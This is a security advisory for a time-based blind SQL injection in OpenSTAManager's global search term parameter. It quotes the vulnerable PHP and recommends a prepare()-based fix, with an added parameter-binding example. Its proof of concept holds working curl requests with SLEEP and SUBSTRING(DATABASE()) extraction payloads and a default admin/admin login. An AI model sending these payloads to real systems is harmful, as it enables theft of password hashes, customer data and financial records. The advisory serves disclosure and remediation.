PT-2026-6848 · Packagist · Devcode-It/Openstamanager

Published

2026-02-06

·

Updated

2026-02-06

CVSS v4.0

8.7

High

Vector

AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Summary

Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with amplified execution across 10+ modules.
Status: ✅ Confirmed and tested on live instance (v2.9.8)
Vulnerable Parameter: term (GET)
Affected Endpoint: /ajax_search.php
Affected Modules: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi

Details

OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.
Vulnerability Chain:
  1. Entry Point: /ajax_search.php (Line 30-31)
$term = get('term');
$term = str_replace('/', '/', $term);
The $term parameter undergoes minimal sanitization (only forward slash replacement).
  2. Distribution: /src/AJAX.php::search() (Line 159-161)
$files = self::find('ajax/search.php');
array_unshift($files, base_dir().'/ajax_search.php');
foreach ($files as $file) {
  $module_results = self::getSearchResults($file, $term);
The unsanitized $term is passed to all module-specific search handlers.
  3. Execution: /src/AJAX.php::getSearchResults() (Line 373)
require $file;
Each module's search.php file is included with the $term variable in scope.
  4. Vulnerable SQL Queries: multiple modules concatenate $term directly without prepare()
All Affected Files (10+ vulnerable instances):
  1. /modules/articoli/ajax/search.php - Line 51 (PRIMARY EXAMPLE)
foreach ($fields as $name => $value) {
  $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
}
$rs = $dbo->fetchArray($query);
Impact: Direct concatenation without prepare() allows full SQL injection.
  2. /modules/ordini/ajax/search.php - Line 43, 47
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
$query .= '... WHERE `mg_articoli`.`codice` LIKE "%'.$term.'%" OR `mg_articoli_lang`.`title` LIKE "%'.$term.'%"';
  3. /modules/ddt/ajax/search.php - Line 43, 47
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
  4. /modules/fatture/ajax/search.php - Line 45, 49
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
  5. /modules/preventivi/ajax/search.php - Line 45, 49
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
  6. /modules/anagrafiche/ajax/search.php - Line 62, 107, 162
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
  7. /modules/impianti/ajax/search.php - Line 46
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
Properly Sanitized (NOT vulnerable):
  • /modules/contratti/ajax/search.php - Uses prepare() correctly
  • /modules/automezzi/ajax/search.php - Uses prepare() correctly
Note: The vulnerability has amplified execution: a single malicious request triggers SQL injection across ALL vulnerable modules simultaneously, so a time-based payload executes 10+ times per request. This multiplies the delay and leads to the 504 Gateway Time-out errors observed on the live demo instance.

PoC

Step 1: Login
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'
Step 2: Verify Vulnerability (Time-Based SLEEP)
# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
# Result: real 72.29s

# Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
# Result: real 0.30s
Step 3: Data Extraction - Database Name
# Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 170.32s

# Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 0m0.30s

Impact

Affected Users: All authenticated users with access to the global search functionality.
  • Complete database exfiltration including customer PII, financial records, business secrets
  • Extraction of password hashes for offline cracking
  • Amplified time-based attacks consume 85x server resources per request
Recommended Fix:
Replace all instances of direct $term concatenation with prepare():
BEFORE (Vulnerable):
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
AFTER (Fixed):
$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');
Apply this fix to ALL affected files:
  1. /modules/articoli/ajax/search.php - Line 51
  2. /modules/ordini/ajax/search.php - Lines 43, 47, 79
  3. /modules/ddt/ajax/search.php - Lines 43, 47, 83
  4. /modules/fatture/ajax/search.php - Lines 45, 49, 85
  5. /modules/preventivi/ajax/search.php - Lines 45, 49, 83
  6. /modules/anagrafiche/ajax/search.php - Lines 62, 107, 162
  7. /modules/impianti/ajax/search.php - Line 46
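The search handler pattern from the Details section, rewritten as an added example (not OpenSTAManager code) in which the term is bound as a parameter instead of concatenated into the LIKE clause, and LIKE metacharacters in the term are escaped so they match literally. It runs against an in-memory SQLite PDO (assumes the pdo_sqlite extension); the table and column names are constructed, modelled on mg_articoli.

```php
<?php
// Added example, not OpenSTAManager code: a module search handler that binds the
// user-supplied term instead of concatenating it into the LIKE clause.
// Runs against an in-memory SQLite PDO (assumes pdo_sqlite); the table and
// columns are constructed, modelled on mg_articoli.
declare(strict_types=1);

// Escape LIKE metacharacters so the term matches literally. Binding stops
// SQL injection; it does not stop "%" or "_" in the term acting as wildcards.
function likePattern(string $term, string $esc = '!'): string
{
    $literal = str_replace([$esc, '%', '_'], [$esc.$esc, $esc.'%', $esc.'_'], $term);
    return '%'.$literal.'%';
}

// One placeholder per searchable column. Column names come from the module's
// fixed $fields map (label => column), never from the request.
function buildSearchQuery(string $table, array $fields, string $term): array
{
    $conditions = [];
    $params = [];
    foreach (array_values($fields) as $i => $column) {
        $conditions[] = '`'.$column."` LIKE :p$i ESCAPE '!'";
        $params[":p$i"] = likePattern($term);
    }
    return ['SELECT * FROM `'.$table.'` WHERE '.implode(' OR ', $conditions), $params];
}

// Hardened counterpart of a module's search.php: the SQL text is fixed and
// $term only ever travels as a bound value.
function searchArticoli(PDO $dbo, string $term): array
{
    $fields = ['Codice' => 'codice', 'Descrizione' => 'descrizione'];
    [$sql, $params] = buildSearchQuery('mg_articoli', $fields, $term);
    $stmt = $dbo->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$dbo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$dbo->exec('CREATE TABLE mg_articoli (id INTEGER PRIMARY KEY, codice TEXT, descrizione TEXT)');
$dbo->exec("INSERT INTO mg_articoli (codice, descrizione) VALUES ('ART-001', 'Filtro 10%'), ('ART-002', 'Cavo')");

// Constructed checks: the advisory's quote-breaking term is now plain data and
// matches nothing, while "%" inside a term matches literally.
$checks = ['cavo' => 1, '" AND 0 OR SLEEP(1) OR "' => 0, '10%' => 1];
foreach ($checks as $term => $expected) {
    $rows = searchArticoli($dbo, (string) $term);
    if (count($rows) !== $expected) {
        throw new RuntimeException("term '$term': got ".count($rows)." rows, expected $expected");
    }
}
echo "all search terms bound as data\n";
```

The same shape applies to the project's own prepare()-based fix above: whichever quoting or binding helper is used, the term must never alter the SQL text, and the column list must stay a hard-coded map rather than anything derived from the request.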

Fix

SQL injection

Weakness Enumeration

Related Identifiers

GHSA-4HC4-8599-XH2H

Affected Products

Devcode-It/Openstamanager